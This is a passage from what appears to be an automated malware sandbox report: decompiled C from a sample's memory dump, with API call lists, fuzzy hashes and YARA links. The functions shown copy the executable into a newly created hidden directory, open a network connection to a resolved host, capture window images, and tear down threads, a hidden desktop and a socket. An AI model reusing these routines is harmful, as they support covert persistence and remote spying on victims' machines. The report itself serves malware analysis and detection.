																									__eflags = _t322;
																									_t406 = 0 | _t322 == 0x00000000;
																								}
																								_t459[1] = _t406;
																								 *_t459 =  *(_t434 + 8);
																							}
																							 *(_t434 + 0x18) = _t459[1];
																							goto L120;
																						}
																						__eflags = _t427;
																						if(_t427 != 0) {
																							 *_t459 =  *(_t459 + _t427 * 8);
																							_t459[1] =  *(_t459 + 4 + _t427 * 8);
																							 *(_t459 + _t427 * 8) = _v728;
																							 *(_t459 + 4 + _t427 * 8) = _v720;
																						}
																						goto L108;
																					}
																					L120:
																					_t296 = _t365 * 0xc;
																					_t198 = _t296 + 0xb34d60; // 0xb469c7
																					 *0xb672b4(_t434);
																					_t298 =  *((intOrPtr*)( *_t198))();
																					_t398 = _v736;
																					__eflags = _t298;
																					if(_t298 == 0) {
																						__eflags = _t398 - 0xb693d8;
																						if(_t398 != 0xb693d8) {
																							_t458 = _t365 + _t365;
																							__eflags = _t458;
																							asm("lock xadd [eax], ecx");
																							if(_t458 != 0) {
																								goto L127;
																							} else {
																								E00B564B8( *((intOrPtr*)(_t434 + 0x28 + _t458 * 8)));
																								E00B564B8( *((intOrPtr*)(_t434 + 0x24 + _t458 * 8)));
																								E00B564B8( *(_t434 + 0xa0 + _t365 * 4));
																								_t401 = _v712;
																								 *(_v724 + _t434) = _t401;
																								 *(_t434 + 0xa0 + _t365 * 4) = _t401;
																							}
																						}
																						_t399 = _v740;
																						 *_t399 = 1;
																						 *((intOrPtr*)(_t434 + 0x28 + (_t365 + _t365) * 8)) = _t399;
																					} else {
																						 *((intOrPtr*)(_v724 + _t434)) = _t398;
																						E00B564B8( *(_t434 + 0xa0 + _t365 * 4));
																						 *(_t434 + 0xa0 + _t365 * 4) = _v748;
																						E00B564B8(_v740);
																						 *(_t434 + 8) = _v752;
																						goto L122;
																					}
																					goto L123;
																				}
																			}
																		} else {
																			L123:
																			__eflags = _v16 ^ _t467;
																			return E00B4AE43(_v16 ^ _t467);
																		}
																		goto L131;
																	}
																	asm("sbb eax, eax");
																	_t283 = _t282 | 0x00000001;
																	__eflags = _t283;
																	goto L91;
																}
															} else {
																_t329 = _t449 + _t449;
																__eflags = _t329 - 0x106;
																if(_t329 >= 0x106) {
																	E00B4AF7A();
																	goto L82;
																} else {
																	 *((short*)(_t465 + _t329 - 0x10c)) = 0;
																	_t331 =  &_v276;
																	_push(_t331);
																	_push(_v456);
																	_push(_t430);
																	L83();
																	_t382 = _v452;
																	_t474 = _t477 + 0xc;
																	__eflags = _t331;
																	if(_t331 != 0) {
																		_t382 = _t382 + 1;
																		_v452 = _t382;
																	}
																	L54:
																	_t446 = _t360 + _t449 * 2;
																	_t267 =  *_t446 & 0x0000ffff;
																	_t421 = _t267;
																	__eflags = _t267;
																	if(_t267 != 0) {
																		_t446 = _t446 + 2;
																		__eflags = _t446;
																		_t421 =  *_t446 & 0x0000ffff;
																	}
																	__eflags = _t421;
																	if(_t421 != 0) {
																		continue;
																	} else {
																		__eflags = _t382;
																		if(__eflags != 0) {
																			goto L79;
																		} else {
																			break;
																		}
																		goto L80;
																	}
																}
															}
														}
													} else {
														_t332 = 0x3b;
														__eflags =  *_t360 - _t332;
														if( *_t360 != _t332) {
															break;
														} else {
															goto L48;
														}
													}
												}
											}
											goto L131;
										}
										goto L80;
									}
								}
							}
						}
					} else {
						__eflags = _t446;
						if(_t446 != 0) {
							_push(_t446);
							_push(_t248);
							_push(_t430);
							L83();
						}
						L80:
						__eflags = _v12 ^ _t465;
						return E00B4AE43(_v12 ^ _t465);
					}
				}
				L131:
			}

APIs

Part of subcall function 00B56F1C: RtlAllocateHeap.NTDLL(00000000,00000104,?,?,00B48FAA,00000104), ref: 00B56F4E

_free.LIBCMT ref: 00B543B6
_free.LIBCMT ref: 00B543CD
_free.LIBCMT ref: 00B543EC
_free.LIBCMT ref: 00B54407
_free.LIBCMT ref: 00B5441E

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 00c9816defc16f587866ca9243fecae4909355ea5924cb1715bbd42eb2cb1db0
Instruction ID: 265088c333de908b61d4fc7b0f684e742498c32e536c4c4532f22811a8176b52
Opcode Fuzzy Hash: 00c9816defc16f587866ca9243fecae4909355ea5924cb1715bbd42eb2cb1db0
Instruction Fuzzy Hash: 4A51C032A00604AFDB21DF29D881B6A77F4EF4872AF5445E9ED09DB260E731AE448B44

Uniqueness

Uniqueness Score: -1.00%

Function 00B491F4, Relevance: 7.6, APIs: 5, Instructions: 91
fileCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E00B491F4(CHAR* __ecx, void* __eflags) {
				char _v8;
				CHAR* _v12;
				CHAR* _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t11;
				CHAR* _t13;
				intOrPtr* _t15;
				void* _t17;
				void* _t19;
				int _t23;
				void* _t29;
				void* _t33;
				char _t36;
				char _t38;
				void* _t41;
				void* _t43;
				void* _t44;
				CHAR* _t46;
				void* _t47;
				CHAR* _t48;
				void* _t49;
				void* _t53;

				_t53 = __eflags;
				_v16 = __ecx;
				_push(0x104);
				_t11 = E00B509A2();
				_push(0x104);
				_v8 = _t11;
				_v12 = E00B509A2();
				_t13 = E00B4903F(0x104,  &_v8,  &_v12, _t44, _t47, _t49, _t53);
				_push(0x104);
				_t48 = _t13;
				_t33 = E00B509A2();
				_t15 = E00B4A582(_t53);
				_t41 = _t33 - _t15;
				do {
					_t36 =  *_t15;
					 *((char*)(_t41 + _t15)) = _t36;
					_t15 = _t15 + 1;
					_t55 = _t36;
				} while (_t36 != 0);
				_push(_t33);
				_push(_v8);
				_push(_t48);
				_t45 = E00B4301E(_t55);
				_t17 = E00B42D46(_t33, _t16, _t48);
				_t56 = _t17;
				if(_t17 != 0) {
					L9:
					__eflags = 0;
					return 0;
				}
				_t19 = E00B4A9CD(_t56, _t45);
				E00B42FDB(_t56, E00B42ECE(_t33, _t45, _t48, _t56), _t19);
				if(PathFileExistsA(_t48) == 1) {
					goto L9;
				}
				_t46 = _v12;
				_t23 = PathFileExistsA(_t46);
				_t58 = _t23 - 1;
				if(_t23 != 1) {
					CreateDirectoryA(_t46, 0);
					SetFileAttributesA(_t46, 6);
				}
				CopyFileA(_v16, _t48, 0);
				_push(_t48);
				E00B48BA1(_t33, _t46, _t48);
				E00B499C5(_t33, _t46, _t48, _t58, _t48, _t33);
				E00B49B90(_t33, _t48, _t48, _t33);
				E00B49CBF(_t33, _t46, _t48, _t58, _t46);
				_push(0x104);
				_t29 = E00B509A2();
				_t43 = _t29 - _t48;
				do {
					_t38 =  *_t48;
					 *((char*)(_t43 + _t48)) = _t38;
					_t48 =  &(_t48[1]);
				} while (_t38 != 0);
				return _t29;
			}

APIs

Part of subcall function 00B4903F: Sleep.KERNEL32(00000064,?,?,?,00000104,00000104), ref: 00B49066

PathFileExistsA.SHLWAPI(00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00B49271
PathFileExistsA.SHLWAPI(?), ref: 00B49280
CreateDirectoryA.KERNEL32(?,00000000), ref: 00B4928E
SetFileAttributesA.KERNEL32(?,00000006), ref: 00B49297
CopyFileA.KERNEL32(?,00000000,00000000), ref: 00B492A3

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: File$ExistsPath$AttributesCopyCreateDirectorySleep
String ID:
API String ID: 3090365614-0
Opcode ID: 95ba09f072d9ba64c68bd891f3f8c8a64753d36c23d05c1d00efc883d598fc4e
Instruction ID: 87fae02b53992c172d314cb267955ef4e2e4681e620564c4cf2c3384d19d5440
Opcode Fuzzy Hash: 95ba09f072d9ba64c68bd891f3f8c8a64753d36c23d05c1d00efc883d598fc4e
Instruction Fuzzy Hash: E221F5709042047BEB123BB85D8AAAF7AECDF42740F1004D4F541A3247DE748B05B7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00B446F7, Relevance: 7.6, APIs: 5, Instructions: 56networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00B44718
socket.WS2_32(00000002,00000001,00000000), ref: 00B44729
gethostbyname.WS2_32(00B6AD28), ref: 00B4473B
htons.WS2_32(00000000), ref: 00B44763
connect.WS2_32(00000000,?,00000010), ref: 00B44774

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: Startupconnectgethostbynamehtonssocket
String ID:
API String ID: 2405761414-0
Opcode ID: 373292ed5eb3e5df2c306cf387350f365ec1f3a9f42fc59794a2439540ac80f3
Instruction ID: 1858e33476ed41492c10984bef6c5aefc3633d04af1420df17d2c72d6ec65505
Opcode Fuzzy Hash: 373292ed5eb3e5df2c306cf387350f365ec1f3a9f42fc59794a2439540ac80f3
Instruction Fuzzy Hash: 7411A030640218AFDB109BA99C49EBE77FCEF06715B0101A9F911E71E0DFB88A019B62

Uniqueness

Uniqueness Score: -1.00%

Function 00B44383, Relevance: 7.6, APIs: 5, Instructions: 54
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00B44383(void* __ebx, void* __edi, void* __esi, struct HWND__* _a4, intOrPtr* _a8) {
				signed int _v8;
				struct _OSVERSIONINFOA _v156;
				void* __ebp;
				signed int _t10;
				intOrPtr* _t34;
				struct HWND__* _t36;
				signed int _t37;

				_t10 =  *0xb69014; // 0xce6f0fb5
				_v8 = _t10 ^ _t37;
				_t36 = _a4;
				_t34 = _a8;
				if(IsWindowVisible(_t36) != 0) {
					E00B442A8(__ebx, _t36,  *_t34, _t34, _t36, _t37,  *((intOrPtr*)(_t34 + 4)));
					SetWindowLongA(_t36, 0xfffffff0, GetWindowLongA(_t36, 0xfffffff0));
					E00B4D0F0(_t34,  &(_v156.dwMajorVersion), 0, 0x90);
					_v156.dwOSVersionInfoSize = 0x94;
					GetVersionExA( &_v156);
					if(_v156.dwMajorVersion < 6 && GetTopWindow(_t36) != 0) {
						E00B4435D(_t34, _t23);
					}
				}
				return E00B4AE43(_v8 ^ _t37);
			}

0x00b4438c
0x00b44393
0x00b44397
0x00b4439b
0x00b443a7
0x00b443b0
0x00b443c3
0x00b443d7
0x00b443df
0x00b443f0
0x00b443fd
0x00b4440e
0x00b4440e
0x00b443fd
0x00b44423

APIs

IsWindowVisible.USER32 ref: 00B4439F

Part of subcall function 00B442A8: GetWindowRect.USER32 ref: 00B442CE
Part of subcall function 00B442A8: CreateCompatibleDC.GDI32 ref: 00B442D5
Part of subcall function 00B442A8: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00B442F0
Part of subcall function 00B442A8: SelectObject.GDI32(00000000,00000000), ref: 00B442FA
Part of subcall function 00B442A8: PrintWindow.USER32(?,00000000,00000000,?,?,?,?,?,?,?,?,00B443B5,?), ref: 00B44303
Part of subcall function 00B442A8: BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00CC0020), ref: 00B44333
Part of subcall function 00B442A8: DeleteObject.GDI32(00000000), ref: 00B4433B
Part of subcall function 00B442A8: DeleteDC.GDI32(00000000), ref: 00B44342

GetWindowLongA.USER32 ref: 00B443B9
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00B443C3
GetVersionExA.KERNEL32(00000094), ref: 00B443F0
GetTopWindow.USER32 ref: 00B44400

Part of subcall function 00B4435D: GetWindow.USER32(00000000,00000001), ref: 00B44374

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CompatibleCreateDeleteLongObject$BitmapPrintRectSelectVersionVisible
String ID:
API String ID: 567582119-0
Opcode ID: 08aade532de90b1fcddf89915bbbff61d172fc60bc4a3b0e52300e01f20293fc
Instruction ID: e9f508f20b6ce60c71724e4c930c25f2f9b69786306b8129f59408204bcc5081
Opcode Fuzzy Hash: 08aade532de90b1fcddf89915bbbff61d172fc60bc4a3b0e52300e01f20293fc
Instruction Fuzzy Hash: 6811A131644114ABDB10AF70DC0AFAE73E8AF4A314F1041A4F515E72D1DF78AB069BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00B5B726, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B5B726(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0xb690c0; // 0xb69114
					if(_t23 != 0) {
						E00B564B8(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0xb690c4; // 0xb6a6b4
					if(_t24 != 0) {
						E00B564B8(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0xb690c8; // 0xb6a6b4
					if(_t25 != 0) {
						E00B564B8(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0xb690f0; // 0xb69118
					if(_t26 != 0) {
						E00B564B8(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0xb690f4; // 0xb6a6b8
					if(_t27 != 0) {
						return E00B564B8(_t6);
					}
				}
				return _t6;
			}

APIs

_free.LIBCMT ref: 00B5B73E

Part of subcall function 00B564B8: RtlFreeHeap.NTDLL(00000000,00000000,?,00B5B9CA,?,00000000,?,?,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?), ref: 00B564CE
Part of subcall function 00B564B8: GetLastError.KERNEL32(?,?,00B5B9CA,?,00000000,?,?,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?,?), ref: 00B564E0

_free.LIBCMT ref: 00B5B750
_free.LIBCMT ref: 00B5B762
_free.LIBCMT ref: 00B5B774
_free.LIBCMT ref: 00B5B786

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: a49e0a795512fb41d97ffad82673622216738656072c08ea4f847885e8cb6394
Instruction ID: 3f7b2c9c1c4f4b915bdd2fc6e804394ef9ea69c38824daf1b8ee18fcac5c7795
Opcode Fuzzy Hash: a49e0a795512fb41d97ffad82673622216738656072c08ea4f847885e8cb6394
Instruction Fuzzy Hash: 38F09632504604EB8A60FB64E9C5E1677EDFA44312BD448C5FD18D7790CF78FC848664

Uniqueness

Uniqueness Score: -1.00%

Function 00B462A9, Relevance: 7.5, APIs: 5, Instructions: 22
threadCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00B462A9() {
				int _t4;

				TerminateThread( *0xb6ae34, 0);
				TerminateThread( *0xb6ae30, 0);
				CloseDesktop( *0xb6ae3c);
				_t4 = CloseHandle( *0xb6ae34);
				 *0xb6ae74 = 0;
				 *0xb6ae88 = 0;
				 *0xb6ae80 = 0;
				 *0xb6ae8c = 0;
				__imp__#3( *0xb6ae40);
				 *0xb6ae3c = 0;
				 *0xb6ae40 = 0;
				return _t4;
			}

0x00b462b3
0x00b462c0
0x00b462cc
0x00b462d8
0x00b462e4
0x00b462ea
0x00b462f0
0x00b462f6
0x00b462fc
0x00b46302
0x00b46308
0x00b4630f

APIs

TerminateThread.KERNEL32(00000000,00000000,00B46157), ref: 00B462B3
TerminateThread.KERNEL32(00000000), ref: 00B462C0
CloseDesktop.USER32 ref: 00B462CC
CloseHandle.KERNEL32 ref: 00B462D8
closesocket.WS2_32 ref: 00B462FC

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseTerminateThread$DesktopHandleclosesocket
String ID:
API String ID: 2795373509-0
Opcode ID: 8678b6c7e5f2a640474e40dcf1eed9ef35a343043ffea431206172c91ccdce33
Instruction ID: 35bb80e3040f776a715460066df63782ee0194cb42af489eb6dc13ec2ab240c9
Opcode Fuzzy Hash: 8678b6c7e5f2a640474e40dcf1eed9ef35a343043ffea431206172c91ccdce33
Instruction Fuzzy Hash: E1F019765592009BCB126F56FD09805BFBAFBE6706320412AE501A32B0CFFF9851EF12

Uniqueness

Uniqueness Score: -1.00%

Function 00B599F3, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 207
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00B599F3(void* __ebx, void* __edi, void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				intOrPtr* _t196;
				signed int _t199;
				intOrPtr _t205;
				signed int _t207;
				signed int _t210;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t219;
				signed int* _t220;
				signed int _t223;
				void* _t226;
				union _FINDEX_INFO_LEVELS _t227;
				intOrPtr _t230;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t237;
				intOrPtr* _t240;
				signed int _t242;
				intOrPtr* _t245;
				signed int _t250;
				signed int _t256;
				signed int _t258;
				signed int _t264;
				intOrPtr* _t265;
				signed int _t273;
				signed int _t275;
				intOrPtr* _t276;
				void* _t278;
				intOrPtr* _t279;
				signed int _t282;
				signed int _t285;
				signed int _t287;
				intOrPtr _t289;
				signed int* _t294;
				signed int _t295;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t301;
				void* _t302;
				void* _t303;
				signed int _t305;
				void* _t309;
				signed int _t310;
				void* _t311;
				void* _t312;
				void* _t313;
				signed int _t314;
				void* _t315;
				void* _t316;

				_t131 = _a8;
				_t312 = _t311 - 0x28;
				if(_t131 != 0) {
					_t294 = _a4;
					_t223 = 0;
					 *_t131 = 0;
					_t285 = 0;
					_t132 =  *_t294;
					_t233 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t223;
						_t134 = _t233 - _t285;
						_t295 = _t285;
						_v12 = _t295;
						_t272 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t233 - _t295;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t297 =  !_t295 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t297;
						if(_t297 != 0) {
							_t214 = _t285;
							_t282 = _t223;
							do {
								_t265 =  *_t214;
								_t20 = _t265 + 1; // 0x1
								_v20 = _t20;
								do {
									_t216 =  *_t265;
									_t265 = _t265 + 1;
									__eflags = _t216;
								} while (_t216 != 0);
								_t223 = _t223 + 1 + _t265 - _v20;
								_t214 = _v12 + 4;
								_t282 = _t282 + 1;
								_v12 = _t214;
								__eflags = _t282 - _t297;
							} while (_t282 != _t297);
							_t272 = _v16;
							_v8 = _t223;
							_t223 = 0;
							__eflags = 0;
						}
						_t298 = E00B533DE(_t136, _t272, _v8, 1);
						_t313 = _t312 + 0xc;
						__eflags = _t298;
						if(_t298 != 0) {
							_v12 = _t285;
							_t139 = _t298 + _v16 * 4;
							_t234 = _t139;
							_v28 = _t139;
							_t140 = _t285;
							_v16 = _t234;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t223;
								 *_a8 = _t298;
								_t299 = _t223;
								goto L25;
							} else {
								_t275 = _t298 - _t285;
								__eflags = _t275;
								_v32 = _t275;
								do {
									_t150 =  *_t140;
									_t276 = _t150;
									_v24 = _t150;
									_v20 = _t276 + 1;
									do {
										_t152 =  *_t276;
										_t276 = _t276 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t276 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E00B63587(_t234, _v28 - _t234 + _v8, _v24);
									_t313 = _t313 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t223);
										_push(_t223);
										_push(_t223);
										_push(_t223);
										_push(_t223);
										E00B52919();
										asm("int3");
										_t309 = _t313;
										_push(_t234);
										_t240 = _v72;
										_t65 = _t240 + 1; // 0x1
										_t278 = _t65;
										do {
											_t159 =  *_t240;
											_t240 = _t240 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t285);
										_t287 = _a8;
										_t242 = _t240 - _t278 + 1;
										_v12 = _t242;
										__eflags = _t242 -  !_t287;
										if(_t242 <=  !_t287) {
											_push(_t223);
											_push(_t298);
											_t68 = _t287 + 1; // 0x1
											_t226 = _t68 + _t242;
											_t302 = E00B598AF(_t226, 1);
											__eflags = _t287;
											if(_t287 == 0) {
												L40:
												_push(_v12);
												_t226 = _t226 - _t287;
												_t164 = E00B63587(_t302 + _t287, _t226, _v0);
												_t314 = _t313 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t230 = _a12;
													_t207 = E00B59F2C(_t230);
													_v12 = _t207;
													__eflags = _t207;
													if(_t207 == 0) {
														 *( *(_t230 + 4)) = _t302;
														_t305 = 0;
														_t77 = _t230 + 4;
														 *_t77 =  *(_t230 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E00B564B8(_t302);
														_t305 = _v12;
													}
													E00B564B8(0);
													_t210 = _t305;
													goto L37;
												}
											} else {
												_push(_t287);
												_t212 = E00B63587(_t302, _t226, _a4);
												_t314 = _t313 + 0x10;
												__eflags = _t212;
												if(_t212 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E00B52919();
													asm("int3");
													_push(_t309);
													_t310 = _t314;
													_t315 = _t314 - 0x298;
													_t166 =  *0xb69014; // 0xce6f0fb5
													_v124 = _t166 ^ _t310;
													_t245 = _v108;
													_t279 = _v104;
													_push(_t226);
													_push(0);
													_t289 = _v112;
													_v724 = _t279;
													__eflags = _t245 - _t289;
													if(_t245 != _t289) {
														while(1) {
															_t205 =  *_t245;
															__eflags = _t205 - 0x2f;
															if(_t205 == 0x2f) {
																break;
															}
															__eflags = _t205 - 0x5c;
															if(_t205 != 0x5c) {
																__eflags = _t205 - 0x3a;
																if(_t205 != 0x3a) {
																	_t245 = E00B635E0(_t289, _t245);
																	__eflags = _t245 - _t289;
																	if(_t245 != _t289) {
																		continue;
																	}
																}
															}
															break;
														}
														_t279 = _v616;
													}
													_t168 =  *_t245;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L56:
														_t227 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L59:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L59;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L59;
																}
															}
														}
														_v676 = _t227;
														_v672 = _t227;
														_push(_t302);
														asm("sbb eax, eax");
														_v668 = _t227;
														_v664 = _t227;
														_v644 =  ~(_t169 & 0x000000ff) & _t245 - _t289 + 0x00000001;
														_v660 = _t227;
														_v656 = _t227;
														_t175 = E00B55F7B(_t245 - _t289 + 1, _t289,  &_v676, E00B56E67(__eflags));
														_t316 = _t315 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t227,  &_v608, _t227, _t227, _t227);
														_t303 = _t179;
														__eflags = _t303 - 0xffffffff;
														if(_t303 != 0xffffffff) {
															_t250 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t250;
															_v648 = _t250 >> 2;
															do {
																_v640 = _t227;
																_v636 = _t227;
																_v632 = _t227;
																_v628 = _t227;
																_v624 = _t227;
																_v620 = _t227;
																_t185 = E00B59924( &(_v608.cFileName),  &_v640,  &_v609, E00B56E67(__eflags));
																_t316 = _t316 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L67:
																	_push(_v616);
																	_push(_v644);
																	_push(_t289);
																	_push(_t188);
																	L33();
																	_t316 = _t316 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t227;
																		if(_v620 != _t227) {
																			E00B564B8(_v632);
																			_t188 = _v652;
																		}
																		_t227 = _t188;
																	} else {
																		goto L68;
																	}
																} else {
																	_t256 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t256;
																	if(_t256 == 0) {
																		goto L68;
																	} else {
																		__eflags = _t256 - 0x2e;
																		if(_t256 != 0x2e) {
																			goto L67;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t227;
																			if( *((intOrPtr*)(_t188 + 2)) == _t227) {
																				goto L68;
																			} else {
																				goto L67;
																			}
																		}
																	}
																}
																L76:
																FindClose(_t303);
																goto L77;
																L68:
																__eflags = _v620 - _t227;
																if(_v620 != _t227) {
																	E00B564B8(_v632);
																}
																__eflags = FindNextFileW(_t303,  &_v608);
															} while (__eflags != 0);
															_t196 = _v616;
															_t258 = _v648;
															_t280 =  *_t196;
															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
															__eflags = _t258 - _t199;
															if(_t258 != _t199) {
																E00B63090(_t227, _t289, _t303, _t280 + _t258 * 4, _t199 - _t258, 4, E00B5990C);
															}
															goto L76;
														} else {
															_push(_v616);
															_push(_t227);
															_push(_t227);
															_push(_t289);
															L33();
															_t227 = _t179;
														}
														L77:
														__eflags = _v656;
														if(_v656 != 0) {
															E00B564B8(_v668);
														}
													} else {
														__eflags = _t245 - _t289 + 1;
														if(_t245 == _t289 + 1) {
															_t168 = _v609;
															goto L56;
														} else {
															_push(_t279);
															_push(0);
															_push(0);
															_push(_t289);
															L33();
														}
													}
													__eflags = _v16 ^ _t310;
													return E00B4AE43(_v16 ^ _t310);
												} else {
													goto L40;
												}
											}
										} else {
											_t210 = 0xc;
											L37:
											return _t210;
										}
									} else {
										goto L23;
									}
									goto L81;
									L23:
									_t213 = _v12;
									_t264 = _v16;
									 *((intOrPtr*)(_v32 + _t213)) = _t264;
									_t140 = _t213 + 4;
									_t234 = _t264 + _v20;
									_v16 = _t234;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t299 = _t298 | 0xffffffff;
							_v12 = _t299;
							L25:
							E00B564B8(_t223);
							_pop(_t235);
